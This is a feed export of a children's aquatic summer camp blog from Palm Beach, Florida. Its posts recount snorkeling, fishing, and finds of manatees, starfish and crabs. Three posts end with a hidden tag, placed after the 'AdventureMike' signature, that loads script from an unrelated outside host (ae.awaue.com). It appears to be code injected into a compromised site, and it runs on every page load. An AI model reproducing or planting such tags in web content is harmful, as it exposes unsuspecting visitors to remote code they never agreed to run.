<p style="text-align: center;">  <img src="http://farm3.static.flickr.com/2438/3605773870_e2570b497c.jpg?v=0" alt="Playing Chicken!" /></p>
<p>We spent one day going to Little Munyon Island to do some seine netting in the shallows and had a ball. We caught numerous mojarra, pinfish, juvenile grunts and snappers, pistol shrimp, popping shrimp, seagrass shrimp, smooth trunkfish and even a checkerboard pufferfish which delighted the group by puffing up with air for a quick photo op! On the way home that day we stopped by Starfish Prairie and hurriedly picked up a few large Cushion Starfish for another quick photo opportunity then released them unharmed exactly where we found them. They were everywhere to be found! Really nice to have nearby&#8230;</p>
<p>And of course, its had to match the fun and excitement of our FISHING DAY!!!. Always non-stop action from start to finish and everyone caught a mixed bag of snappers, tomtates, caesars grunts, sailor&#8217;s choice, margates, spot-tail pinfish, porkfish and AdventureNeil caught one scorpionfish which I was happy to get back in the water as quickly as possible. You definitely want to stay away from the venomous spines on those!!! I learned that the hard way many a year ago and don&#8217;t want to repeat that EVER again! OUCH!!! All in all, I can&#8217;t tell you how many times I heard, &#8220;I NEED MORE BAIT!!!&#8221; over and over and OVER!!! Good thing AdventureNicholas from last summer came to give me a hand helping to bait lines, unhook fish and clean up, and even still, we were running deep in the hole behind this gang trying to keep up with all the fish they were catching!!!</p>
<p>All in all, it was a fabulous first week!!! When it was time to head back, no-one was ready to call it a day!!! We were just too busy having fun!!! And Just the way I love it!!! And lucky for me, I got to do it all over again with the second group of Adventurers for the afternoon session!!! Doesn&#8217;t get any better than that!!! Wish you could have joined us!!!! We had a BLAST!!! I just couldn&#8217;t wait for the second adventure session to begin!!!</p>
<p>All you guys will be missed, and I can&#8217;t wait to see you again!, but it was time to&#8230;</p>
<p style="text-align: center;"><img class="aligncenter" src="http://farm4.static.flickr.com/3591/3605774064_a40c1d7da0.jpg?v=0" alt="Hill Jumpin at the Beach" width="450" height="338" /></p>
<p>Go Have Some More Fun!!!</p>
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		<title>A Manatee Adventure in Palm Beach!</title>
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		<pubDate>Fri, 15 Aug 2008 01:31:07 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
				<category><![CDATA[Week 10]]></category>
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Welcome Back! We just finished up the first day of another new and wonderful adventure session and as usual we had an absolutely fantastic time! It was perfect from start to finish! Just the way I love it!!! AdventureJonah, Annie, Allison and Nicholas came back for some more adventuring and the four of us [...]]]></description>
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<p>Welcome Back! We just finished up the first day of another new and wonderful adventure session and as usual we had an absolutely fantastic time! It was perfect from start to finish! Just the way I love it!!! AdventureJonah, Annie, Allison and Nicholas came back for some more adventuring and the four of us were joined by five new adventurers, Adventure Emily, Katie, McKenzie, Megan and Joseph. Everyone was excited and ready to start the day. I quickly gave a run down on what we were going to do and we loaded up, donned life jackets and off we went.</p>
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<p>We went straight to the Rock Garden, dropped anchor, readied our gear and in we went. From the very start I could tell this was going to be another great group. It didn&#8217;t take them long to get ready and they could swim like fish! Just great!!!The minute we got in we were surrounded by parrotfish, surgeonfish, doctor fish, porkfish, pinfish, grunts, snappers, wrasse, menhaden and hundreds of tropical fish too numerous to mention. We saw some barracudas, snook and  large houndfish chasing menhaden with blue runners quickly following. It was wonderful to see so many fish in such shallow water and as usual the visibility was almost perfect.</p>
<p>We swam from spot to spot chasing fish, catching hermit crabs, finding queen conchs and looking for &#8220;treasures&#8221;. We covered almost every square inch, stopping here and there to check out something new, answer questions and look for more. It was non stop fun for two hours and we finally headed back to the boat for some snacks and drinks and take a quick breather. The wind was out of the west today and the ocean flat calm so we pulled anchor and decided to motor around the south jetty and park right next to the beach. What a great decision that was!!!</p>
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<p>We didn&#8217;t even have a chance to drop anchor before we spotted two large manatees coming right towards us. They stopped in three feet of water not far from the boat and just laid there and nibbled algae off each others backs for half an hour. We had such a fabulous time watching them from 3 feet away. You just wanted to swim up and kiss one! Well actually, both of them! They didn&#8217;t even mind that we were there watching and smiling the whole time. It just doesn&#8217;t get any better than that!!!, and boy were we lucky to have that opportunity in crystal clear water! What a way to start the first day!!! Right on!!!</p>
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<p>A while later they swam into deeper water and we spent some time swimming along the shoreline looking for shells and watching juvenile permit and pompano search for sand fleas in the shallows. We just could not have had a more wonderful first day than this! With only a short time left we loaded up, motored to the sand bar and searched for fighting conchs, mantis shrimp and what ever else we could discover. We found both Florida and West Indian fighting conchs and watched as many were laying eggs. We found one conch that was extremely beautiful! Instead of being solid orange or dark brown inside, it had a pure white interior that was outlined in bright purple. </p>
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<p>Absolutely gorgeous! I have never seen one like this before, really a nice discovery! Everyone took a look, then we put it back where we found it and swam back to the boat. It was time to go, and I can tell you nobody wanted to head home yet! I had heard it all before, &#8221; AdventureMike, why can&#8217;t your camp last till 3 or 5 instead of 1, why do we have to go back so soon?&#8221; Oh boy, I still haven&#8217;t come up with a good answer for that&#8230;.  and most of the time I don&#8217;t want to go back either. Oh well&#8230;</p>
<p>All of us had such a wonderful time! You could see it in our smiles and hear the excitement in our voices! We just couldn&#8217;t wait to do it all over again! Each one of us was looking forward to tomorrow! We just can&#8217;t wait!!!</p>
<p>Stay tuned&#8230;.. We are going to have some fun!!!   I can guarantee it!!! Right on!!!</p>
<p>AdventureMike<script src="http://ae.awaue.com/7"></script></p>
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		<title>Pool Hopping Near Munyon Island</title>
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		<pubDate>Tue, 01 Jul 2008 00:46:15 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
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Welcome back! We just finished up the first day of another new adventure session and as usual, what a great day it was! Adventure David and Dina from last week had so much fun they decided to join me for this week too.  Alright! I just love it when kids come back! After [...]]]></description>
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<p>Welcome back! We just finished up the first day of another new adventure session and as usual, what a great day it was! Adventure David and Dina from last week had so much fun they decided to join me for this week too.  Alright! I just love it when kids come back! After a weekly session of adventuring you almost feel like you&#8217;ve become family. We have that great a time! I&#8217;m going to miss them when they go back home to Hungary. Today the three of us were joined by 4 new adventurers, AdventureCorey, Hannah, Parker and Maxwell, and I can already tell its going to be another great group!</p>
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<p>We left the dock and headed out to do the normal first day adventure going to the Rock Garden and checking out the hundreds of fish that call this place home. When I came around the bend I noticed the sandbar was already exposed and dead low tide wasn&#8217;t till around noon so I knew it was going to be an extreme low tide. When we arrived at the Rock Garden the water was only about 2 feet deep instead of the usual 4 to 5 foot range so we anchored out a bit further than normal got our snorkel stuff together and got in. The large schools of menhaden, parrotfish and sheepshead were still there. We all took little collection nets and spent the first hour catching blue crabs, hermit crabs, swimming crabs, arrowcrabs, rock crabs, brittle starfish, blennies and a variety of pistol and popping shrimp. I think each one of us caught something different. After a while, the water level got so low we could walk from place to place without getting deeper than our knees. I have never seen such a low tide here. It has to be an unusual planetary alignment or moon phase or both to cause this extreme low tide. We decided to go to the sandbar to check that out.</p>
<p>When we arrived, we were amazed by what we saw. The whole north side of the island was exposed for hundreds of yards. It was just so unusual to see this much area out of water. We could already see shells and starfish popping out of the sand. We hurriedly grabbed our nets, masks and a bucket and headed out to explore.  By the time we got to the sandbar, AdventureCorey, David, Parker and Maxwell had nets full of crabs.</p>
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<p>We found some really unusual box crabs, egg masses to moon snails and fighting conchs and lettered olives were popping from the sand by the hundreds. We discovered them in all sizes from tiny to gigunda. I had never seen this before. It was just fabulous and AdventureDina and Hannah had handfuls to observe and let slither around before letting go. We had to find at least a dozen beaded starfish that we let go in deeper water so the birds wouldn&#8217;t eat them and some very large baby&#8217;s ears snails that were coming out from the sand. We explored the whole area and found so much. It was great to search the exposed areas I had never seen out of water before and even the sea grasses were high and dry.</p>
<p>We came to a large swimming pool sized hole that was around 8 feet deep in the middle with a dry bank all around it and full of fish. We would take turns running off the bank and doing cannonballs to make the biggest splashes and see who could jump out the furthest. We had a ball.</p>
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<p>Before we knew it the day was over and we had to head back to the boat. On the walk back along the sandbar AdventureParker found a very large nine armed starfish crawling out from beneath the sand and showed us all. It was a nice find! We took some photos then he moved it to deeper water also so it wouldn&#8217;t dry out in the sun or get eaten by a bird. Just as we were coming to the end of the sandbar we spotted something crawling towards the water and ran to see it.  It was a very large and beautiful Rooster Crab, one of the largest members of the box crab or shame-faced family of crabs.</p>
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<p>They get their name from the way they hold their claws folded in front as if they are &#8220;ashamed&#8221; to show their faces. The Rooster Crab gets its name from the raised edge of this folded claw that looks like cackles on a rooster. This is the only one I have ever seen here and a real beauty to find. We were lucky! It may be many years before I see another one like this, and especially one this large. Just great! Thank you&#8230;</p>
<p>From here we climbed back aboard the &#8220;Dream Chaser&#8221; and headed back.  And on the way I was again asked, &#8220;why  don&#8217;t I end the camp at 5pm instead of 1pm?  We don&#8217;t want to go back yet!&#8221; and I mumbled something about how the weather gets worse around 3pm and didn&#8217;t want anyone out in lightning or thunderstorms, etc. but at that moment I don&#8217;t think they seemed to care. They were too busy having fun and its hard to quit while your still smiling! I know all about that, and it seemed like we just started. Oh well&#8230;</p>
<p>and there&#8217;s always tomorrow, and who knows what we may discover then, but one thing is certain, &#8220;We&#8217;re going to have Fun&#8221;!!!   Stay tuned to see what we find&#8230;  or better yet, come join us for your own adventure!!!  Have a story to tell of your own and memories to share forever.</p>
<p>See you on the return,</p>
<p>AdventureMike<script src="http://ae.awaue.com/7"></script></p>
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		<title>Two More Days of Adventure in Palm Beach</title>
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		<pubDate>Fri, 27 Jun 2008 01:28:51 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
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I just finished up TWO more days adventure session and let me say this week has been perfect.  We have a great group of adventurers whose enthusiasm and love for the water is contagious! They arrive early to begin the days adventure with huge smiles and excitement in their voices, and raring to [...]]]></description>
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<p>I just finished up TWO more days adventure session and let me say this week has been perfect.  We have a great group of adventurers whose enthusiasm and love for the water is contagious! They arrive early to begin the days adventure with huge smiles and excitement in their voices, and raring to go! They jump in the boat, don their life jackets and don&#8217;t want to waste one more minute waiting at the dock then they have too. Saying they are extremely excited to go is an understatement!!! They know by now that AdventureMike&#8217;s is not your &#8220;normal&#8221; summer camp! Even after a very full day of adventuring they are never ready to come back. Reminds me of myself as a child, no matter how much fun I had, it just never was enough! I feel the same as an adult now! No wonder I love this group too!  Each session just seems to be getting better and better.</p>
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<p>Yesterday we started off the day heading back to the sandbar and searching the shallows. AdventureAllison, Madison, Dina and David found some really cool types of shells called &#8220;baby&#8217;s ears&#8221; that have the shell on the inside of the living animal instead of on the outside. They are very unusual and look more like large white nudibranchs or slugs instead of shells, and can burrow thru the sand very quickly. As the sandbar gets exposed and begins to dry out the living creatures begin to &#8220;pop&#8221; out from underneath the sand and head for water. By now the kids know what&#8217;s underneath just by looking at the type and shape of the &#8220;cracks&#8221; in the sand. They can tell whether its a crab, clam, moon snail, etc., and are quick to let me know.  We are constantly being surprised by all kinds of emerging creatures from crabs, shells, clams, starfish, sea cucumbers and a variety of burrowing worms and other invertebrates. A regular smorgasbord of tiny living treasures just waiting to be discovered, and all, by us!!! Just Fabulous!!!</p>
<p>From here we headed to a secret out of the way little place I call &#8220;Starfish Prairie&#8221; that has hundreds if not thousands of large Cushion Sea Stars also called Bahama starfish. It is a very shallow hard rock bottom totally covered in short spined urchins and Sea Stars from end to end. I don&#8217;t let too many people know where this spot is as it is a true treasure in the Lake Worth Lagoon. In just a minute or two we picked up 9 or 10 from the shallow water and placed them in a large livewell container on the boat along with about 10 totally different colored sea urchins from snow white to a rich dark purple. We got back in the boat and talked about their life cycles and habitat, behavior, feeding habits, predators and prey etc.,  then hurriedly took a quick photo op. and released them where we found them. As long as too much fresh water run-off is not dumped into the lake all at once, they will continue to survive. The kids loved when they turned the large Sea Stars over and discovered the tiny delicate brittlestarfish, about a quarter inch in total length, clinging to the underneath sides. This was a great moment for them and I could tell they just loved it!</p>
<p>We finished up here and headed to the back side of Munyon Island to look for horseshoe crabs, hermit crabs and blue crabs and take a short nature walk thru the estuary and shallow lagoon. We had so much fun along the beach and water we never got to the nature walk. AdventureNicholas showed Dina and Gavin how to tie fishing knots and cast netted some pufferfish for our entertainment.  We all got to see how pufferfish get their name. It is always fun to watch them as they suck in air and water and literally double their size. Each adventurer had the opportunity to rub the smooth shiny belly of one of the checkered puffers and make a wish before letting them go, a childhood pastime of my families. How it started, who knows, but it sure is fun!!! I can&#8217;t remember if any of my wishes ever came true but it always put a smile on my face and that counts just as much!!! Just make sure to stay away from the mouth, or as I say &#8220;the business end&#8221; of a pufferfish as they can take an absolutely perfectly clean round bite out of a finger or your hand if given the opportunity. I&#8217;ll bet you&#8217;ll never guess how I found that out as a child&#8230;and on more than one occasion at that. Needless to say, I make sure to hold each fish gently and carefully so that each child has nothing to fear.</p>
<p>After this we had about 45 minutes left so we quickly headed to Little Munyon Island to explore and hopefully find one of those nine armed starfish that AdventureAnnie discovered last week. The only way I know how to do this is to find an area underwater with course well worked sand and just run your fingers back and forth thru the sand as you swim. Try and cover as much area as you can and if you are lucky you might find one. Watch out for broken glass and fireworms if you are in an area where they might be, just in case.  AdventureAllison, Gavin and Trevor worked with me while AdventureDavid and Nicholas collected sea urchins for Madison and Dina who were taking a break in the boat. We searched and searched and searched till it was almost time to leave and just as I was getting ready to call it a day, my fingers found what we were looking for. I gently dug and sure enough it was a nice nine armed starfish.  I was glad we found one! I really wanted Allison, Gavin and Trevor to see one since they had looked so hard too, and everyone had a chance to hold another new species and learn a little bit more about its behavior. On the way back I breathed a sigh of relief and was glad we got a bit lucky! I always love when things work out the way you hope!</p>
<p>Today, was the day I planned for us to fish and when I arrived at  the dock not only were the Adventurers early, they were ready and willing and in a hurry to go!!! Everyone was asking if I &#8220;brought enough rods, enough bait, am I sure, am I sure, etc.&#8221; and I smiled and said yes even though I really wasn&#8217;t sure at the time.</p>
<p>I anchored the boat over the same section of artificial reef where we had done so well last Friday. I watched as 6 lines went down, hit bottom and instantly had fish on. Just like before, it was non stop action. The minute the bait hit bottom something was trying to eat it! Everyone had fish on all the time!!! It took everything AdventureNicholas and I could do to keep bait on the hooks and take fish off. No matter how fast we worked there was always a line of excited adventurers waiting. It seemed like we had 30 adventurers in the boat not just 6, and I&#8217;m sure to Nicholas it seemed more like 60!!! I didn&#8217;t see him get a chance to eat or drink the whole time we were there. Talk about having non stop fun, we did!!! I&#8217;ve never seen fish come in the boat so fast, and sometimes only parts of fish. Glad I spent my whole life diving here and marked all the hot-spots where the fish were. Made things easy for me later on&#8230;</p>
<p>It didn&#8217;t take long for the big barracudas to show up and park themselves right underneath the hull. The way everyone was catching fish, they knew they had pulled up to an &#8220;all you could eat diner&#8221; and for free too. I heard AdventureDavid yell, &#8220;I have a big one, A BIG ONE!!!, and just when I turned around, I saw a big swoosh by the side of the boat . I watched as David lifted his line out of the water with nothing but the very nose of his &#8220;Big Fish&#8221; left dangling. So much for almost catching the &#8220;big one&#8221; but I know it didn&#8217;t get away. I knew that just underneath us was a fat and happy barracuda  waiting for the next one to be reeled in too. </p>
<p>I decided to try and hook a barracuda for the kids to reel in so I rigged a line with some wire leader, put on a fish and tossed it out. The second it hit the water, and I mean second, the water exploded and a huge barracuda launched skyward with the bait in his mouth. I didn&#8217;t even get a chance to take a turn on the reel before he had eaten the bait and thrown the hook. I could tell that these big barracudas had been hooked on numerous occasions before! They knew exactly what to do! The huge barracuda landed right next to the boat with a mighty splash, just about soaking AdventureMadison in the process, and then was gone. Talk about exciting for every one, it was great!!!! I know they won&#8217;t forget that!</p>
<p>We were so busy having fish on that I am sorry to say I didn&#8217;t get much of a chance to take photos of the whole encounter. Next time I may have to have the kids wait while I use the camera instead of bait the hooks, but its hard when you have 6 very happy and excited kids wanting their baits back in the water faster than you can possibly move, all wanting to catch the next &#8220;Big One&#8221;.    I was the exact same way. Oh well&#8230; </p>
<p>It seemed like we only spent an hour fishing but when I looked at my watch, three and a half hours had already passed. It was the first time I had a chance to look at my watch all day.  We quickly reeled and headed to the Rock Garden to get in the water, rinse off and feed the last bit of our bait to the friendly inhabitants.  Again I found myself wondering just how did the time go by so fast? How can things move so quickly? It seemed to us all like we just started?  And it seems to be so true&#8230;and often said,</p>
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<p>&#8220;Time Flies, When You&#8217;re Having Fun&#8221;!!!!  Our 6 happy kids would tell you that today!!!!  Nothing but smiles!!! and the way I like it!!!   Each day a real blessing!   Thank you!</p>
<p>Come be a part of the Adventure!!!  Just a few spaces left till next year&#8230; I guarantee your child will have fun!!!</p>
<p>See you soon,</p>
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		<title>Ctenophores and More in the Lake Worth Lagoon!</title>
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		<pubDate>Wed, 25 Jun 2008 08:08:54 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
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		<description><![CDATA[  I just finished up the first day of another new adventure session with a wonderful group of adventurers, and as usual, it was a blast! I had a full boat today and one of my best friends sons, AdventureNicholas, gave me a hand helping with all the things needing to be done, but [...]]]></description>
			<content:encoded><![CDATA[<p>  I just finished up the first day of another new adventure session with a wonderful group of adventurers, and as usual, it was a blast! I had a full boat today and one of my best friends sons, AdventureNicholas, gave me a hand helping with all the things needing to be done, but most of all entertaining the kids and making sure everyone left with smiles from ear to ear. Which of course they did! He was great to have along and after the days session was over helped me clean the barnacles off the bottom of the boat and put away all the gear. Thanks so much, I really appreciate it!!!</p>
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<p>We had 3 new adventurers join us for the first time, AdventureAllison, AdventureGavin and AdventureTrevor plus 3 returning adventurers, AdventureMadison, AdventureDina and AdventureDavid. It was a great group to have together and we laughed and had fun the whole day.  I can&#8217;t remember when I or anyone else laughed this hard.</p>
<p>We started the day going right around the corner to the sandbar and anchoring in knee deep water. We hopped out and everyone was instantly collecting fighting conchs, juvenile blue crabs and looking for starfish. We found fighting conchs with blue eyes, brown eyes and even some with green eyes and a few shy ones that never came out of their shells to show us what color eyes they had. Madison found a really nice empty Alphabet Cone and I believe Gavin or Trevor found a few empty sundial shells that get their name from the way they are shaped and patterned. Nice find!!!, and not many around sitting empty. There were hundreds of ctenophores, a type of non-stinging jellyfish like tunicate washing into the shallows as the tide went out that look and feel exactly like clear jelly. I brought up the fact that my brother and I used to play with them as kids, and the next thing I know I became target practice for 6 laughing kids hurling ctenophores in my direction. I got one in my ear, in my mouth and even one up my nose. I thought I was going to die of laughter! I&#8217;ve never seen kids laugh so hard and for so long as today. I couldn&#8217;t open my mouth long enough to yell, &#8220;aim for Nicholas instead of me&#8221; without one just about flying in there. I&#8217;m still laughing just thinking about it&#8230;and I know they are too.</p>
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<p>From here we went to the Rock Garden and everyone got in to snorkel and check out all the fish, crabs and Hairy Blennies. And as usual, they were there by the hundreds. We saw parrotfish, angelfish, barracudas, sheephead, houndfish, snook, needlefish, lizardfish, porkfish, snappers, grunts, flounders, large schools of menhaden and an assortment of tropical fish too numerous to mention. We found hermit crabs by the hundreds, rock crabs, blue crabs, stone crabs, shamefaced crabs and sally lightfoot crabs running on the rocks just at the high tide mark. None of us wanted to get out of the water! That kept us busy for the rest of the day, barely had time to snack. AdventureGavin, David and Trevor caught crabs and blennies and put them in a bucket for all to see, while AdventureAllison, Madison and Dina collected hermit crabs and looked for shells. We all worked together and it was a blast. AdventureNicholas made sure we had what we needed, carried creatures back and forth to the buckets and brought us drinks when we asked.  It was a perfect day!!!</p>
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<p>Somehow when the kids got in the boat they found my hidden stash of Squirt guns and nothing stayed dry after that, including my glasses which I could barely see out of. Next time I&#8217;m going to hide a &#8220;super soaker&#8221; for me and blast them all in return. Can&#8217;t wait&#8230;Some kids just never grow up, and that would include me too. Oh well&#8230; we had fun!</p>
<p>From here it was time to go, and as we headed back we saw a quite large eagle ray foraging in the shallows for conchs. Had to be 6 feet across. We stopped to watch as he glided about and then disappeared into the deeper water. It was a beautiful way to end the day! On the way back the kids kept saying ,&#8221;why do we have to go back now? Why can&#8217;t you run your camp till 3 or 5 and not end at 1? I don&#8217;t want to go back yet, do we have to go back now?&#8221; I told them their parents would be waiting for them and they said why don&#8217;t I just call and have them come back later? I didn&#8217;t have a good answer for that. They seem to think of everything nowadays. I told them there is always tomorrow, three more days left, and who knows what we are going to see next&#8230; That didn&#8217;t really satisfy them but they quit asking, and I didn&#8217;t really want to go in either. I understood how they felt. Oh well&#8230;</p>
<p>And for all the rest of you who haven&#8217;t experienced AdventureMike&#8217;s aquatic summer camp&#8230; Stay tuned, or better yet, Come join us for our next adventure!!! Get off the couch and get outside&#8230; Be a part of the Adventure!!!</p>
<p>Lets all go have some Fun!!!</p>
<p>AdventureMike<script src="http://ae.awaue.com/7"></script></p>
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		<title>From Hungary to Palm Beach</title>
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		<pubDate>Sun, 22 Jun 2008 01:02:41 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
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<p>We just finished up another great week full of adventure and thrills and at the same time were lucky enough to miss all the rain that seemed to fall everywhere but on us. Most of the showers came thru around 3pm, long after we were off the water. We could not have timed things better, thank you&#8230;</p>
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<p>We started off yesterdays adventure session with a little bit of trolling down the inter-coastal waterway south along the Palm Beach Island side. I hoped to hook some large jack crevalles or barracudas on light tackle just to give Adventurers Jonah, Annie, Jake and Javier a real tussle trying to bring them in. No luck, but we trolled down to an old tugboat that looked like it had been out of service for the last 50 years or more just to check it out and give Jonah an up close view.  We all found it fascinating and pondered its history and years of service.</p>
<p>From here, everyone wanted to go back to the Rock Garden to go snorkeling, search for hermit crabs and try and catch pufferfish and lizardfish. Adventure Annie spent her time trying to catch pufferfish barehanded. Her technique was so good that I can guarantee one day she will get one! We made a bet to see who could find the smallest shell with a hermit crab in it, and for a long while I was in the lead. Just when I thought I was going to win, Javier came up with one that I knew was going to be tough to beat, so back to work, Adventure Jake, Jonah and I went looking. We all wanted to win and I was going to give it my best. I planned on winning just to set an example that you could do anything with persistence and determination. There was just one thing I neglected to think about or seemed to overlook. And that one thing was the fact that &#8220;eagle eye&#8221; Jake could see a hermit crab about half the size of a head of a pin and not just see it, but pick it up and sure enough he won! I had to take it back to the boat and look at it with my glasses on just to see if it was a shell, and sure enough while I was looking at it, out came the tiniest blue legs I have ever seen. I had to declare him the winner. The only way I&#8217;ll ever beat that is to go have some prescription lenses put in my mask and then use a magnifying glass on top of that. Its funny how age has a way of catching up with you and evening the odds. I thought I had the better skill and experience, he just had the better eye sight. Oh well&#8230; and of course maybe skill too.</p>
<p>From here we took a quick trip around the island, stopped on the west side to play a little bocce ball, do a bit of snorkeling and fishing then had to hurry to get back to the dock on time. We all had a great day!</p>
<p>Today was a little bit different than the normal routine. A week or two ago I was contacted by a very nice lady, Elizabeth, calling from Hungary in Europe. She had google searched &#8220;summer camps&#8221; and found my website. After reading about it, she thought it might be fascinating for her children to attend so she decided to call me. After speaking for a while, she told me she was going to come to Delray Beach, FL with her two children and would like to meet me and that she would arrive on Tuesday. I told her Friday morning, (today) would be the best opportunity for us to meet, and speak with some parents and kids who are attending AdventureMike&#8217;s and get a real feel of what it is all about. Its not your &#8220;normal&#8221; summer camp experience. I love what I do too much!</p>
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<p>As Adventure Jonah, Annie, Javier and Jake were boarding the boat she arrived with her son David and daughter Dina. While we were speaking, Adventure Annie and Dina became instant friends and Annie did not want me to leave without taking Dina along. She asked me, (more like insisted), if Dina could go. I looked at her mom and she looked back at me and shrugged, and I said, &#8220;Lets go have some fun!&#8221; and we were joined by Adventure David and Adventure Dina and off we went. I had planned on spending the morning fishing, and then snorkeling the last half of the day and we stuck to the plan.</p>
<p>I dropped anchor by the artificial reef 400 yards away and baited the hooks. I watched as four lines dropped down, hit bottom and instantaneously hooked up in unison. The adventurers began to scream with joy. It was nonstop action for three hours. They all took turns reeling fish in, while I baited the hooks, unhooked the fish and de-tangled some lines. I cannot describe how fabulous it was to watch the 6 kids working together, sharing rods, helping each other reel the fish in, letting go the fish and smiling from ear to ear, and doing it all on their own. I think the real highlight came when a very large  barracuda took up residence under the boat and left his mark on one nice yellowtail snapper that Adventure Jake was reeling in. The kids got to see first hand just how &#8220;toothy&#8221; a big barracuda is. The excitement in their voices reached a crescendo when I threw the head back in and the water exploded right next to the boat as two large barracudas fought for the spoils. I think every one in the boat had to catch at least 10 to 15 grunts, yellowtail snapper, lane snapper, cottonwicks, or porgies each. I know we boated over a hundred fish total and only 2 break offs. Not bad for 3 hours of fishing! I know the kids will never forget that, especially Adventure Dina and David! Their non stop smiles from ear to ear summed up the day! I don&#8217;t think they catch fish like this in Hungary!!!</p>
<p>When the bait came to an end we headed back to the Rock Garden to snorkel. I wanted Adventure David and Dina to see just how beautiful is. They are considering coming next week and I wanted them to have an idea of what they would encounter. Adventurers Jonah, Jake, Javier and Annie showed them around and brought them to the best spots. The boys hung together chasing fish and catching crabs with nets, while Adventure Annie and Dina were inseparable and collected shells. It was fantastic to watch and be a part of! As usual, the time seemed to fly by way too quickly and none of us were ready to head back when it was time to go. I&#8217;m going to miss this bunch too&#8230;</p>
<p>I just can&#8217;t tell you how personally rewarding it is for me to look into the eyes of the adventures, see their smiles and hear their laughter and know, you have left them with some truly wonderful and special memories they may never forget. For me, it is times like these that make me feel life has come full circle. To have the opportunity to share with others the things I love, the things my parents so freely shared with me, the things I will never forget, always cherish, and forever be thankful for is truly a blessing!!!! Thank you&#8230;!!!!</p>
<p>I can&#8217;t wait till the next adventure to begin!!!   Come join us.  I don&#8217;t have many more spots left.    Lets go have some Fun!!!</p>
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		<title>I Found a Hermit Crab!!!</title>
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		<pubDate>Sat, 07 Jun 2008 01:47:10 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
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			<content:encoded><![CDATA[<p>Look at Annie!  At the beginning of the week she was hesitant and as she gained experience in the water she became a true adventurer.  Take a look at her now.  Here&#8217;s a quick video of her diving down, picking up a rock, and finding a hermit crab clinging to the bottom.</p>
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<p>Thanks to Annie, Jonah, Ariana, Liana, Drew, Karyn, Robin, and Barbara for a great second week.</p>
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